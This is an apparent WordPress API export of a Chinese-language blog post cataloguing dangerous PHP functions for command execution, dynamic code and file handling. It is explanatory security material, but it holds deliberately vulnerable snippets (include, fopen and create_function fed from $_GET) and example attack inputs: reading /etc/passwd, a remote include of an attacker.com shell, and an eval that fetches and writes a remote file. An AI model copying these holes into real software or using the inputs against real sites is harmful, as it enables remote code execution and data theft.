{"id":33,"date":"2024-09-01T00:09:00","date_gmt":"2024-08-31T16:09:00","guid":{"rendered":"http:\/\/54.254.190.68\/note\/?p=33"},"modified":"2025-01-08T21:41:30","modified_gmt":"2025-01-08T13:41:30","slug":"dangerous-php-code","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/33","title":{"rendered":"Dangerous PHP code"},"content":{"rendered":"\n<p>PHP\u4e2d\u6709\u4e00\u4e9b\u51fd\u6578\u5728\u4e0d\u7576\u4f7f\u7528\u6216\u672a\u7d93\u9069\u7576\u4fdd\u8b77\u6642\u53ef\u80fd\u6703\u5f15\u767c\u56b4\u91cd\u7684\u5b89\u5168\u554f\u984c\uff0c\u9019\u4e9b\u51fd\u6578\u88ab\u7a31\u70ba\u5371\u96aa\u51fd\u6578\u3002\u5b83\u5011\u7684\u5371\u96aa\u6027\u901a\u5e38\u8207\u57f7\u884c\u7cfb\u7d71\u547d\u4ee4\u3001\u52d5\u614b\u4ee3\u78bc\u57f7\u884c\u3001\u6587\u4ef6\u64cd\u4f5c\u6216\u5916\u90e8\u6578\u64da\u8655\u7406\u76f8\u95dc<\/p>\n\n\n\n<p>\u7cfb\u7d71\u547d\u4ee4\uff1asystem,exec,shell_exec,passthru,popen,proc_open,pcntl_exec<\/p>\n\n\n\n<p>\u52d5\u614b\u4ee3\u78bc\uff1aeval,assert,preg_replace<\/p>\n\n\n\n<p>\u6587\u4ef6\u64cd\u4f5c\uff1ainclude\/require\/include_once\/require_once,file_get_contents,file_put_contents,fopen\/fwrite,move_uploaded_file<\/p>\n\n\n\n<p>\u52d5\u614b\u57f7\u884c\u5916\u90e8\u8f38\u5165\u7684\u51fd\u6578\uff1acall_user_func\/call_user_func_array,create_function<\/p>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u7cfb\u7d71\u547d\u4ee4<\/h2>\n\n\n\n<p>\u5982\u679c\u9019\u4e9b\u51fd\u6578\u63a5\u53d7\u672a\u7d93\u8655\u7406\u7684\u7528\u6236\u8f38\u5165\uff0c\u653b\u64ca\u8005\u53ef\u80fd\u901a\u904e\u547d\u4ee4\u6ce8\u5165\u4f86\u57f7\u884c\u4efb\u610f\u7cfb\u7d71\u547d\u4ee4\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">system<\/h3>\n\n\n\n<p>\u540c C \u7248\u672c\u7684 system() \u51fd\u6578\u4e00\u6a23\uff0c\u672c\u51fd\u6578\u57f7\u884c command \u53c3\u6578\u6240\u6307\u5b9a\u7684\u6307\u4ee4\uff0c\u4e26\u4e14\u8f38\u51fa\u57f7\u884c\u7d50\u679c\u3002<br>\u5982\u679c PHP \u904b\u884c\u5728\u4f3a\u670d\u5668\u6a21\u7d44\u4e2d\uff0c system() \u51fd\u6578\u4e5f\u6703\u5617\u8a66\u5728\u6bcf\u884c\u8f38\u51fa\u5b8c\u7562\u4e4b\u5f8c\uff0c \u81ea\u52d5\u5237\u65b0 web \u4f3a\u670d\u5668\u7684\u8f38\u51fa\u5feb\u53d6<\/p>\n\n\n\n<p>\u57f7\u884c\u7cfb\u7d71\u6307\u4ee4\uff0c\u8fd4\u56de\u5167\u5bb9\u50c5\u6703\u5132\u5b58\u6240\u6709\u7d50\u679c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nsystem(\"ls -l\");\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u6703\u57f7\u884cls -l\uff0c\u4e26\u986f\u793a\u8a72\u76ee\u6a19\u4e0b\u6240\u6709\u6a94\u6848<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">exec<\/h3>\n\n\n\n<p>\u57f7\u884c\u7cfb\u7d71\u6307\u4ee4\uff0c\u8fd4\u56de\u5167\u5bb9\u50c5\u6703\u4fdd\u5b58\u6700\u5f8c\u4e00\u884c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\necho exec(\"ls -l\");\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u6703\u57f7\u884cls -l\uff0c\u4f46\u53ea\u986f\u793a\u8a72\u76ee\u6a19\u4e0b\u7684\u6700\u5f8c\u4e00\u884c\u5167\u5bb9<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">shell_exec<\/h3>\n\n\n\n<p>\u900f\u904e shell \u74b0\u5883\u57f7\u884c\u547d\u4ee4\uff0c\u4e26\u4e14\u5c07\u5b8c\u6574\u7684\u8f38\u51fa\u4ee5\u5b57\u4e32\u7684\u65b9\u5f0f\u50b3\u56de<br>\u4f46\u5982\u679c\u8981\u986f\u793a\u8fd4\u56de\u5167\u5bb9, \u9700\u8981\u900f\u904eecho\u7b49\u65b9\u5f0f\u52a0\u8a0a\u606f\u8f38\u51fa<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>shell_exec('ls -l');<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u6703\u57f7\u884cls -l\uff0c\u4f46\u4e0d\u6703\u986f\u793a\u4efb\u4f55\u5167\u5bb9<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<h3 class=\"wp-block-heading\">passthru<\/h3>\n<\/div>\n\n\n\n<p>\u57f7\u884c\u7cfb\u7d71\u6307\u4ee4\u4e26\u4e14\u986f\u793a\u539f\u59cb\u8f38\u51fa\uff0c\u9069\u5408\u8f38\u51fa\u4e8c\u9032\u5236\u6578\u64da<\/p>\n\n\n\n<p>\u7576\u6240\u57f7\u884c\u7684\u6307\u4ee4\u6703\u8f38\u51fa\u4e8c\u9032\u4f4d\u6578\u64da\u6642\uff0c \u4e14\u9700\u8981\u76f4\u63a5\u50b3\u9001\u5230\u700f\u89bd\u5668\u7684\u6642\u5019\uff0c \u9700\u8981\u7528passthru()\u4f86\u53d6\u4ee3exec() \u6216 system() \u7b49\u51fd\u6578<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>passthru('ls -l');<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u6703\u57f7\u884cls -l\uff0c\u4e26\u986f\u793a\u8a72\u76ee\u6a19\u4e0b\u6240\u6709\u6a94\u6848<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">popen<\/h3>\n\n\n\n<p>popen()\u7528\u65bc\u57f7\u884c\u7cfb\u7d71\u547d\u4ee4\u4e26\u8fd4\u56de\u4e00\u500b\u7ba1\u9053\uff0c\u901a\u904e\u8a72\u7ba1\u9053\u53ef\u4ee5\u8b80\u53d6\u6216\u5beb\u5165\u547d\u4ee4\u7684\u6a19\u6e96\u8f38\u5165\u6216\u8f38\u51fa<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \npopen(\"ls -l\",\"r\");\n?><\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u6703\u57f7\u884cls -l\uff0c\u4f46\u4e0d\u6703\u986f\u793a\u4efb\u4f55\u5167\u5bb9<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">proc_open<\/h3>\n\n\n\n<p>\u5141\u8a31\u57f7\u884c\u7cfb\u7d71\u547d\u4ee4\u4e26\u8207\u547d\u4ee4\u7684\u6a19\u6e96\u8f38\u5165\u3001\u8f38\u51fa\u548c\u932f\u8aa4\u6d41\u9032\u884c\u4ea4\u4e92\u3002\u5b83\u6bd4popen()\u66f4\u9748\u6d3b\uff0c\u56e0\u70ba\u5b83\u5141\u8a31\u4f7f\u7528\u591a\u500b\u7ba1\u9053\u4f86\u8655\u7406\u547d\u4ee4\u8f38\u5165\u8f38\u51fa\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \n$descriptorspec = &#91;0 => &#91;\"pipe\", \"r\"], 1 => &#91;\"pipe\", \"w\"], 2 => &#91;\"pipe\", \"w\"]];\n$process = proc_open(\"ls -l\", $descriptorspec, $pipes);\n?><\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u6703\u57f7\u884cls -l\uff0c\u4f46\u4e0d\u6703\u986f\u793a\u4efb\u4f55\u5167\u5bb9<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">pcntl_exec<\/h3>\n\n\n\n<p>\u7576\u57f7\u884c pcntl_exec() \u6642\uff0c\u7576\u524d PHP \u8173\u672c\u505c\u6b62\u57f7\u884c\uff0c\u4e26\u88ab\u65b0\u7a0b\u5e8f\u53d6\u4ee3\u3002<br>\u4e0d\u8fd4\u56de\u57f7\u884c\u7d50\u679c\uff0c\u56e0\u70ba\u5b83\u4e0d\u6703\u6062\u5fa9\u5230 PHP \u8173\u672c\u4e2d\u3002<br>\u53c3\u6578\u4ee5\u6578\u7d44\u50b3\u905e\uff0c\u8207\u51fd\u6578\u5982 exec() \u6216 system() \u4e0d\u540c\uff0cpcntl_exec() \u4e0d\u9700\u8981\u624b\u52d5\u8655\u7406\u53c3\u6578\u8f49\u7fa9\uff0c\u56e0\u70ba\u53c3\u6578\u4ee5\u6578\u7d44\u7684\u5f62\u5f0f\u50b3\u905e\uff0c\u907f\u514d\u4e86\u76f4\u63a5\u62fc\u63a5\u547d\u4ee4\u5b57\u7b26\u4e32\u7684\u98a8\u96aa<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$path = $_GET&#91;'path'];  \npcntl_exec($path, &#91;'arg1', 'arg2']);<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u52d5\u614b\u4ee3\u78bc<\/h2>\n\n\n\n<p><br>\u9019\u4e9b\u51fd\u6578\u6703\u57f7\u884c\u52d5\u614b\u751f\u6210\u7684\u4ee3\u78bc\uff0c\u5982\u679c\u7528\u6236\u8f38\u5165\u672a\u7d93\u904e\u6ffe\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u63d2\u5165\u60e1\u610f\u4ee3\u78bc\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">eval<\/h3>\n\n\n\n<p>eval() \u51fd\u6578\u628a\u5b57\u4e32\u4f9d\u7167 PHP \u7a0b\u5f0f\u78bc\u4f86\u8a08\u7b97\u3002\u5b57\u4e32\u5fc5\u9808\u662f\u5408\u6cd5\u7684 PHP \u7a0b\u5f0f\u78bc\uff0c\u4e14\u5fc5\u9808\u4ee5\u5206\u865f\u7d50\u5c3e\u3002<\/p>\n\n\n\n<p>\u4ee5\u4e0b\u6703\u986f\u793a111<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php  eval(\"echo 111;\");  ?&gt;<\/code><\/pre>\n\n\n\n<p>\u4e5f\u53ef\u4ee5\u57f7\u884c\u4e0a\u8ff0\u7684\u7528\u4f86\u547c\u53eb\u7cfb\u7d71\u6307\u4ee4\u7684\u4ee3\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php  eval(\"system('ls -l');\");  ?&gt;<\/code><\/pre>\n\n\n\n<p>\u4e5f\u53ef\u4ee5\u5beb\u6a94\uff0c\u4ee5\u4e0b\u5982\u679c\u986f\u793a10\u8868\u793a\u5beb\u5165\u6210\u529f <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php eval(\"echo file_put_contents('test.php','write test');\"); ?&gt;<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u8981\u5beb\u5165\u7684\u5167\u5bb9\u592a\u591a\uff0c\u4e5f\u53ef\u5f9e\u5916\u90e8web\u628a\u6a94\u6848\u53d6\u56de\u4f86\u5728\u5beb\u6a94 ,\u5982\u679c\u6210\u529f\u6703\u56de\u50b3\u5177\u4f53\u6578\u5b57 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php eval(\"echo file_put_contents('test.php',file_get_contents('https:\/\/systw.net\/test.php'));\"); ?&gt;<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">assert<\/h3>\n\n\n\n<p>\u9664\u4e86\u57f7\u884c\u65b7\u8a00\u6aa2\u67e5\u5916\uff0c\u4e5f\u53ef\u4ee5\u57f7\u884c\u52d5\u614b\u4ee3\u78bc\uff08\u5728\u67d0\u4e9b\u60c5\u6cc1\u4e0b\u8207 eval() \u985e\u4f3c\uff09\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php  assert('echo \"Hello World\";'); ?><\/code><\/pre>\n\n\n\n<p>\u4e0d\u540c\u7248\u672cphp\u53cd\u61c9\u5982\u4e0b<\/p>\n\n\n\n<p>\u2022 PHP 5.x\uff1aassert() \u9ed8\u8a8d\u652f\u6301\u5b57\u7b26\u4e32\u57f7\u884c\uff0c\u985e\u4f3c\u65bc eval()\uff0c\u5bb9\u6613\u88ab\u9ed1\u5ba2\u5229\u7528\u3002<\/p>\n\n\n\n<p>\u2022 PHP 7.x\uff1aassert() \u884c\u70ba\u8f49\u70ba\u8a9e\u53e5\u6a21\u5f0f\uff0c\u4f46\u5982\u679c\u672a\u7981\u7528\uff0c\u4ecd\u53ef\u80fd\u5c0e\u81f4\u9593\u63a5\u4ee3\u78bc\u57f7\u884c\u3002<\/p>\n\n\n\n<p>\u2022 PHP 8.x\uff1a\u9ed8\u8a8d\u7981\u7528 assert()\uff0c\u964d\u4f4e\u4e86\u5229\u7528\u98a8\u96aa\uff0c\u4f46\u932f\u8aa4\u914d\u7f6e\u4ecd\u53ef\u80fd\u5e36\u4f86\u5b89\u5168\u554f\u984c\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">preg_replace<\/h3>\n\n\n\n<p>\u5728 PHP 7.0 \u4e4b\u524d\u7684\u7248\u672c\u4e2d\uff0c\u5141\u8a31\u57f7\u884c\u6b63\u5247\u8868\u9054\u5f0f\u66ff\u63db\u52d5\u614b\u4ee3\u78bc\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$input = $_GET&#91;'data'];\n$output = preg_replace('\/(.+)\/e', 'system(\"$1\")', $input);<\/code><\/pre>\n\n\n\n<p>\u653b\u64ca\u8005\u8a2a\u554f http:\/\/example.com\/script.php?data=ls \u5c31\u6703\u57f7\u884c system(&#8220;ls&#8221;);<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6587\u4ef6\u64cd\u4f5c<\/h2>\n\n\n\n<p>\u5982\u679c\u6587\u4ef6\u8def\u5f91\u6216\u5167\u5bb9\u57fa\u65bc\u672a\u7d93\u904e\u6ffe\u7684\u7528\u6236\u8f38\u5165\uff0c\u53ef\u80fd\u5c0e\u81f4\u654f\u611f\u6587\u4ef6\u88ab\u8a2a\u554f\u3001\u8986\u84cb\u6216\u57f7\u884c\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">include \/ require \/ include_once \/ require_once<\/h3>\n\n\n\n<p>\u5c07\u5916\u90e8 PHP \u6587\u4ef6\u5305\u542b\u5230\u7576\u524d\u8173\u672c\u4e2d\u57f7\u884c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>include($_GET&#91;'page']);<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u653b\u64ca\u8005\u57f7\u884chttp:\/\/example.com\/script.php?page=\/etc\/passwd\uff0c\u670d\u52d9\u5668\u5c31\u6703\u57f7\u884cinclude(&#8216;\/etc\/passwd&#8217;);<\/p>\n\n\n\n<p>\u5982\u679c allow_url_include \u70ba On\uff0c\u653b\u64ca\u8005\u53ef\u8a2a\u554f http:\/\/example.com\/script.php?page=http:\/\/attacker.com\/shell.php\uff0c\u670d\u52d9\u5668\u5c31\u6703\u57f7\u884c <br>include(&#8216;http:\/\/attacker.com\/shell.php&#8217;);<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4e0d\u540c\u8a9e\u6cd5\u7684\u7528\u9014\u7279\u9ede\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>include \u5305\u542b\u4e26\u57f7\u884c\u6307\u5b9a\u7684\u6587\u4ef6 \u9047\u5230\u932f\u8aa4\u6642\u50c5\u7522\u751f\u8b66\u544a\uff08Warning\uff09\uff0c\u7e7c\u7e8c\u57f7\u884c\u5f8c\u7e8c\u4ee3\u78bc\u3002<\/li>\n\n\n\n<li>require \u5305\u542b\u4e26\u57f7\u884c\u6307\u5b9a\u7684\u6587\u4ef6 \u9047\u5230\u932f\u8aa4\u6642\u7522\u751f\u81f4\u547d\u932f\u8aa4\uff08Fatal Error\uff09\uff0c\u505c\u6b62\u57f7\u884c\u5f8c\u7e8c\u4ee3\u78bc\u3002<\/li>\n\n\n\n<li>include_once \u5305\u542b\u6587\u4ef6\uff0c\u4f46\u50c5\u5728\u672a\u88ab\u5305\u542b\u904e\u7684\u60c5\u6cc1\u4e0b\u57f7\u884c \u9632\u6b62\u91cd\u8907\u5305\u542b\u76f8\u540c\u6587\u4ef6\uff0c\u9047\u5230\u932f\u8aa4\u50c5\u8b66\u544a\uff0c\u7e7c\u7e8c\u57f7\u884c\u5f8c\u7e8c\u4ee3\u78bc\u3002<\/li>\n\n\n\n<li>require_once \u5305\u542b\u6587\u4ef6\uff0c\u4f46\u50c5\u5728\u672a\u88ab\u5305\u542b\u904e\u7684\u60c5\u6cc1\u4e0b\u57f7\u884c \u9632\u6b62\u91cd\u8907\u5305\u542b\u76f8\u540c\u6587\u4ef6\uff0c\u9047\u5230\u932f\u8aa4\u7522\u751f\u81f4\u547d\u932f\u8aa4\uff0c\u505c\u6b62\u57f7\u884c\u5f8c\u7e8c\u4ee3\u78bc\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">file_get_contents<\/h3>\n\n\n\n<p>\u8b80\u53d6\u6587\u4ef6\u6216 URL \u7684\u5167\u5bb9\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>file_get_contents('\/etc\/passwd');<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">file_put_contents<\/h3>\n\n\n\n<p>\u5c07\u5167\u5bb9\u5beb\u5165\u6587\u4ef6\uff0c\u5982\u679c\u76ee\u6a19\u6587\u4ef6\u53ef\u5beb\u4e14\u672a\u9a57\u8b49\uff0c\u53ef\u80fd\u88ab\u7528\u65bc\u5beb\u5165\u60e1\u610f\u4ee3\u78bc\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>file_put_contents('test.php', '&lt;?php echo \"Hacked\"; ?>');<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">fopen<strong> \/ <\/strong>fwrite<\/h3>\n\n\n\n<p>\u7528\u65bc\u6253\u958b\u3001\u5beb\u5165\u6587\u4ef6\u3002\u9ed1\u5ba2\u53ef\u4ee5\u5229\u7528\u672a\u53d7\u63a7\u7684\u6587\u4ef6\u540d\u6216\u8def\u5f91\uff0c\u8986\u84cb\u61c9\u7528\u4e2d\u5df2\u6709\u7684\u6587\u4ef6\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$handle = fopen($_GET&#91;'filename'], 'w');\nfwrite($handle, $_GET&#91;'filecontent'];);\nfclose($handle);<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">move_uploaded_file<\/h3>\n\n\n\n<p>\u8655\u7406\u6587\u4ef6\u4e0a\u50b3\uff0c\u5982\u679c\u672a\u505a\u6aa2\u67e5\uff0c\u53ef\u4ee5\u4e0a\u50b3PHP shell\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>move_uploaded_file($_FILES&#91;'file']&#91;'tmp_name'], '\/var\/www\/html\/' . $_FILES&#91;'file']&#91;'name']);<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u52d5\u614b\u57f7\u884c\u5916\u90e8\u8f38\u5165\u7684\u51fd\u6578<\/h2>\n\n\n\n<p>\u5728\u7a0b\u5e8f\u4e2d\u6839\u64da\u7528\u6236\u63d0\u4f9b\u7684\u8f38\u5165\uff08\u5982URL\u53c3\u6578\u6216\u8868\u55ae\u6578\u64da\uff09\u4f86\u52d5\u614b\u8abf\u7528\u51fd\u6578\u6216\u57f7\u884c\u908f\u8f2f\u3002\u5982\u679c\u9019\u7a2e\u57f7\u884c\u672a\u7d93\u9069\u7576\u7684\u9a57\u8b49\u548c\u9650\u5236\uff0c\u53ef\u80fd\u6703\u5c0e\u81f4\u5b89\u5168\u98a8\u96aa<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">call_user_func \/ call_user_func_array<\/h3>\n\n\n\n<p>\u8abf\u7528\u7528\u6236\u6307\u5b9a\u7684\u51fd\u6578\uff0c\u683c\u5f0f\u70ba call_user_func($_GET[&#8216;function&#8217;], $arg1, $arg2); \uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \n$func = $_GET&#91;'func'];\ncall_user_func($func, 'Alice');\n?><\/code><\/pre>\n\n\n\n<p>\u7576\u653b\u64ca\u8005\u8a2a\u554fhttp:\/\/example.com\/script.php?func=phpinfo\uff0c\u5c31\u6703\u57f7\u884cphpinfo(&#8216;Alice&#8217;);<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">create_function<\/h3>\n\n\n\n<p>\u52d5\u614b\u5275\u5efa\u533f\u540d\u51fd\u6578\uff0c\u63a5\u53d7\u5169\u500b\u53c3\u6578\uff1a\u8b8a\u91cf\u5217\u8868\u548c\u51fd\u6578\u4e3b\u9ad4\uff08\u5df2\u5728 PHP 7.2 \u4e2d\u68c4\u7528\uff09\u3002<\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u4ee5\u4e0b\u6703\u8fd4\u56de7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$func = create_function('$a, $b', 'return $a + $b;');\necho $func(3, 4);<\/code><\/pre>\n\n\n\n<p>\u4e0d\u5b89\u5168\u7684\u7528\u6cd5\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$code = $_GET&#91;'code'];\n$func = create_function('$x', $code);\necho $func(42);<\/code><\/pre>\n\n\n\n<p>\u7576\u653b\u64ca\u8005\u8a2a\u554fhttp:\/\/example.com\/script.php?code=system(&#8220;ls&#8221;);\uff0c\u5c31\u6703\u57f7\u884csystem(&#8220;ls&#8221;);<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PHP\u4e2d\u6709\u4e00\u4e9b\u51fd\u6578\u5728\u4e0d\u7576\u4f7f\u7528\u6216\u672a\u7d93\u9069\u7576\u4fdd\u8b77\u6642\u53ef\u80fd\u6703\u5f15\u767c\u56b4\u91cd\u7684 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-33","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/33","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=33"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/33\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=33"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=33"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=33"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}